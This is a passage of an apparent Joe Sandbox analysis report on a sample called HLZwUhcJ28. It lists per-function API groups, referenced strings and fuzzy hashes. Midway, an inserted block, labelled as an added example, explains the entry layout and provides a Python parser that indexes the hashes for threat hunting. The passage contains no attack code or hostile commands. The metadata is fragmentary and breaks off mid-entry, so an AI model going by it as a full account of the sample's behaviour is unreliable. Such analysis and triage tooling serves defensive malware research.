• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                          • String ID: ]
                                                                                                                                                                          • API String ID: 1797374341-3352871620
                                                                                                                                                                          • Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                          • Instruction ID: 6703028db3c2a2f312cf263babf5c7eaaa3f13ec50ab94bd0f83bfe19934f465
                                                                                                                                                                          • Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                          • Instruction Fuzzy Hash: 73118621F0D64655EA14BB61DE5477AF291EF88BC8F880035DD4E47B96DF2EE8049620

                                                                                                                                                                          Control-flow Graph

[Control-flow graph 2361 (rendered image not preserved): basic blocks from 7ff70ecd5db8 to 7ff70ecd5ff3; API calls CreateFileW, SetFileTime, CloseHandle; internal calls to 7ff70ecd5890, 7ff70ecd5ff4, 7ff70ecd80b0, 7ff70ecde734, 7ff70ecf5c30, 7ff70ecf5b1c, 7ff70ecfae94]
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 2398171386-0
• Opcode ID: f20cc6b91e24e5c13e9133321993dce3257c4d33c318f0f139d1affa32006537
• Instruction ID: 343a993c9aedfe7b0afcc5e80a83396c8fbcd6149c4f75992febd5749d0c3953
• Opcode Fuzzy Hash: f20cc6b91e24e5c13e9133321993dce3257c4d33c318f0f139d1affa32006537
• Instruction Fuzzy Hash: BC51C472B1CB42A9FB60EB65EC403BEA3A1AF447A8F844235DE1D47AD4DF3E94458310

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Message$DispatchObjectPeekSingleTranslateWait
• String ID:
• API String ID: 3621893840-0
• Opcode ID: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
• Instruction ID: 8f2233786a57235a538821d2c280ccae13e3609c3ddc82077d488b3e167748de
• Opcode Fuzzy Hash: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
• Instruction Fuzzy Hash: 1AF04F22F38486A2F750A734FC59BBAA211EFA4705FD41030D94E428A59F3CD549CB20

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
• Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
• Instruction ID: 0b73392a0e47a04c896eeb8991f0062eca8e2318d5f4e4a3c9abe3972a0ee4b1
• Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
• Instruction Fuzzy Hash: 32F0EC36F3855292EB90AB70FD55AB6A361FF94749FC05431E64E829A4DF2CD508CB10
APIs
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE568F
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF70ECE5695
  • Part of subcall function 00007FF70ECD6288: FindClose.KERNELBASE(?,?,?,00007FF70ECDFFA5), ref: 00007FF70ECD62BD
  • Part of subcall function 00007FF70ECE1DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF70ECE1E25
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
• String ID: zip$zipx
• API String ID: 2713956076-1268445101
• Opcode ID: 26ff80d175eae686738a58c4fe58806cd34ce87d0909e4acf2f92a162777bad7
• Instruction ID: 856a0c919d40f1848afa305fc6cf9e032d21bde93dfefde6a4de5567af7dda20
• Opcode Fuzzy Hash: 26ff80d175eae686738a58c4fe58806cd34ce87d0909e4acf2f92a162777bad7
• Instruction Fuzzy Hash: 4781BC62B09A0295FA00AB65EC405BDB366EF84B9CF940236DE6D177E9DF3DE441C320
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: AutoClassCompareCompleteFindNameStringWindow
• String ID: EDIT
• API String ID: 4243998846-3080729518
• Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
• Instruction ID: cd4ed1c013cc831a365297d3908161b6b9ea0e4c075b42ba588014c4d12a3999
• Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
• Instruction Fuzzy Hash: 46016D22B18A8691FA20AB21FC217B6E390EF98744FC81031C94D47795DF2DD048C720
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: FileWrite$Handle
• String ID:
• API String ID: 4209713984-0
• Opcode ID: a08c35de12cc0ad55c2b8d3b4cac24de81053f1d764ab1386139015918f8ab8d
• Instruction ID: 751c572f679a1a7c525353627fdc755bfbb2d484d5e03d87564c2f0681d2a3d0
• Opcode Fuzzy Hash: a08c35de12cc0ad55c2b8d3b4cac24de81053f1d764ab1386139015918f8ab8d
• Instruction Fuzzy Hash: 9351F422B1D642A2EA14EB25DC0477BE360FF44BA5F800131EB1D47A90DF3EE444C710
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$TextWindow
• String ID:
• API String ID: 2912839123-0
• Opcode ID: 52c42f635bd84e7c386a5cb6d45f56bbd2e5f0363e7f362e44c94dfc8240b572
• Instruction ID: 72470c44e677d3213e44fb5612e8015e04bbe002371ecde7546d5ccbf1602f6f
• Opcode Fuzzy Hash: 52c42f635bd84e7c386a5cb6d45f56bbd2e5f0363e7f362e44c94dfc8240b572
• Instruction Fuzzy Hash: 77519362F24792A5FB00ABA9DC553EEA322AF44B94F900635DA5C177D5DF7ED440C320
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1452418845-0
                                                                                                                                                                          • Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                          • Instruction ID: c3106fe7c1f41a36d425b1f8a537aa9f9010d884fb751c13761fb20b816fecb7
                                                                                                                                                                          • Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                          • Instruction Fuzzy Hash: DE313B20E0C147A5FA14BB649C623BBA291EF41384FC84535EA4E472D7DF3EF90582B0
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2359106489-0
                                                                                                                                                                          • Opcode ID: ffdd47a62d5d541dff0e329547613356fc3e375843f87fc9b7e700371383d697
                                                                                                                                                                          • Instruction ID: ffcb7f3e8d31cb89bce3c9dbf1f8ee5bec8b29ee936776d8da1db28d475d1395
                                                                                                                                                                          • Opcode Fuzzy Hash: ffdd47a62d5d541dff0e329547613356fc3e375843f87fc9b7e700371383d697
                                                                                                                                                                          • Instruction Fuzzy Hash: 57319526A1C742D1EB20BB25AD482BFE251FF89790FD44231EA9D436D5DF3ED4458620
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2244327787-0
                                                                                                                                                                          • Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                          • Instruction ID: d5a20eb48cc97ff4563fe5e023ec2ca327f2ce8dab9b0571190866fed0f20c6c
                                                                                                                                                                          • Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
                                                                                                                                                                          • Instruction Fuzzy Hash: 23216F31E0C64292EA68AF11AC4033BE7A0FF45B94F944531DB6D47688EF3FE9558760
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryInitializeMallocSystem
                                                                                                                                                                          • String ID: riched20.dll
                                                                                                                                                                          • API String ID: 174490985-3360196438
                                                                                                                                                                          • Opcode ID: 365b79f259f2d495b187002154b0899407bd3c7620a567aa1c77a60e11cfd5d3
                                                                                                                                                                          • Instruction ID: 5d1a4a317768e1442d19d895910f35689307fec87cd23f449be308b6a5c82d1f
                                                                                                                                                                          • Opcode Fuzzy Hash: 365b79f259f2d495b187002154b0899407bd3c7620a567aa1c77a60e11cfd5d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 37F04F72A18B4682EB10AB60EC542AAF3A0FF84354F840235E58E42A64DFBCD558CB10
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2032784890-0
                                                                                                                                                                          • Opcode ID: 52822e37058ddecc27f569699c86d0792f62d3f64013b6b984386d0650054082
                                                                                                                                                                          • Instruction ID: 9ffc10539ccecaf1add9743d1c127c1beb26bf42a8e7b1c80103b6401b88c4df
                                                                                                                                                                          • Opcode Fuzzy Hash: 52822e37058ddecc27f569699c86d0792f62d3f64013b6b984386d0650054082
                                                                                                                                                                          • Instruction Fuzzy Hash: F8618D72B18B41E8EB00EF74C8642AD7361EF44798F804635DA5D23B99DF3AD595C320
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2272807158-0
                                                                                                                                                                          • Opcode ID: 33f9f6c40ca51d6f515c3526a5403399e820703fc3a7be890d6b1ee693d7ae16
                                                                                                                                                                          • Instruction ID: 0ac1b9417cbfe3b8b90ffecb59797207705c36f712687903970b2c49e8a4c296
                                                                                                                                                                          • Opcode Fuzzy Hash: 33f9f6c40ca51d6f515c3526a5403399e820703fc3a7be890d6b1ee693d7ae16
                                                                                                                                                                          • Instruction Fuzzy Hash: 8541B372A1878592EB14AB15E84426AA3A1FF85BB4F944335DFBD03AD5CF3EE4908710
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2176759853-0
                                                                                                                                                                          • Opcode ID: 5d2bab8f51f9d314410111c7f186ae8538523e7159733306ab38017dbe6a81e0
                                                                                                                                                                          • Instruction ID: cc30bbf46bac8eda7a13e14d3c10851b2aaa1bf0c46d517dfbdb79b7cafacc2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5d2bab8f51f9d314410111c7f186ae8538523e7159733306ab38017dbe6a81e0
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C21C072A29B8591EA14AB25A84016EE360FF88BD0F944235EBDC03B99DF3DE180C700
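The per-function entries above all share one layout: an "APIs" heading (optionally followed by "Strings"), the Memory Dump Source lines, the IDA plugin snapshot, and a Similarity block whose last line, the Instruction Fuzzy Hash, is the value an analyst searches across other reports to find the same function in related samples. The following parser is an added example, not code from Joe Sandbox or from this report; its SAMPLE input is constructed from two entries copied off this page. The regular expression, the use of the "APIs" heading as the record separator, the treatment of "$" in the API ID value as a group separator, and the CRT_MARKERS list (MSVC runtime helper names seen on this page) are this example's own assumptions.

```python
"""Parse the per-function "Similarity" entries of a Joe Sandbox report.

Added example, not part of the Joe Sandbox report. SAMPLE is constructed from
two entries copied from this page (indentation and the "Download File" link
text removed); the field labels are the report's own.
"""
import re

SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 2359106489-0
• Opcode ID: ffdd47a62d5d541dff0e329547613356fc3e375843f87fc9b7e700371383d697
• Instruction ID: ffcb7f3e8d31cb89bce3c9dbf1f8ee5bec8b29ee936776d8da1db28d475d1395
• Opcode Fuzzy Hash: ffdd47a62d5d541dff0e329547613356fc3e375843f87fc9b7e700371383d697
• Instruction Fuzzy Hash: 57319526A1C742D1EB20BB25AD482BFE251FF89790FD44231EA9D436D5DF3ED4458620
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: DirectoryInitializeMallocSystem
• String ID: riched20.dll
• API String ID: 174490985-3360196438
• Opcode ID: 365b79f259f2d495b187002154b0899407bd3c7620a567aa1c77a60e11cfd5d3
• Instruction ID: 5d1a4a317768e1442d19d895910f35689307fec87cd23f449be308b6a5c82d1f
• Opcode Fuzzy Hash: 365b79f259f2d495b187002154b0899407bd3c7620a567aa1c77a60e11cfd5d3
• Instruction Fuzzy Hash: 37F04F72A18B4682EB10AB60EC542AAF3A0FF84354F840235E58E42A64DFBCD558CB10
"""

# "• Label: value"; the value may be empty (String ID is blank for most entries).
FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
# Substrings of MSVC runtime helper names seen in this report's API ID values.
# Entries made only of these are library code, not the sample's own logic
# (assumption: the list is limited to what this page shows).
CRT_MARKERS = ("_invalid_parameter_noinfo_noreturn", "__scrt_")


def parse_entries(text: str) -> list[dict]:
    """Split the report text into one dict of "Label -> value" per function.

    Every function entry on the page starts with the "APIs" heading, so it is
    used as the record separator; bullet lines before the first heading
    (a truncated entry) are ignored.
    """
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            if current:
                entries.append(current)
            current = {}
        elif current is not None and (m := FIELD_RE.match(line)):
            current[m.group(1).strip()] = m.group(2).strip()
    if current:
        entries.append(current)
    return entries


def api_tokens(entry: dict) -> list[str]:
    """The report joins API-name groups with '$'; return them as a list."""
    return [t for t in entry.get("API ID", "").split("$") if t]


def is_crt_only(entry: dict) -> bool:
    """True when every API group is a runtime helper, i.e. triage noise."""
    tokens = api_tokens(entry)
    return bool(tokens) and all(any(mk in t for mk in CRT_MARKERS) for t in tokens)


def pivot_index(entries: list[dict]) -> dict[str, str]:
    """Map Instruction Fuzzy Hash -> API ID for the non-CRT functions.

    The fuzzy hash is the value to search in other reports when hunting for
    the same function in related samples.
    """
    return {e["Instruction Fuzzy Hash"]: e["API ID"]
            for e in entries if not is_crt_only(e)}


def string_references(entries: list[dict]) -> list[tuple[str, str]]:
    """(API ID, String ID) for every function that references a string."""
    return [(e["API ID"], e["String ID"]) for e in entries if e.get("String ID")]


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print(pivot_index(parsed))
    print(string_references(parsed))
```

Feed it the de-indented text of a whole report section and the two result functions give you the fuzzy hashes worth pivoting on and the functions that reference strings (here, the one that loads riched20.dll) without wading through the runtime-helper entries.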
                                                                                                                                                                          APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1203560049-0
• Opcode ID: a1a2a352783569c4148b81fca6241be51c2e066d394ca70f0e015e6fb04d1bf9
• Instruction ID: c8d1ff06684a5fa6da3529932d85f30f368e4343a70e716422509105279357d9
• Opcode Fuzzy Hash: a1a2a352783569c4148b81fca6241be51c2e066d394ca70f0e015e6fb04d1bf9
• Instruction Fuzzy Hash: 83210A23B1CB8591EA20AB24E85427FE361FF88B94F944231EBAD43694DF3EE540C614
APIs
Similarity
• API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
• String ID:
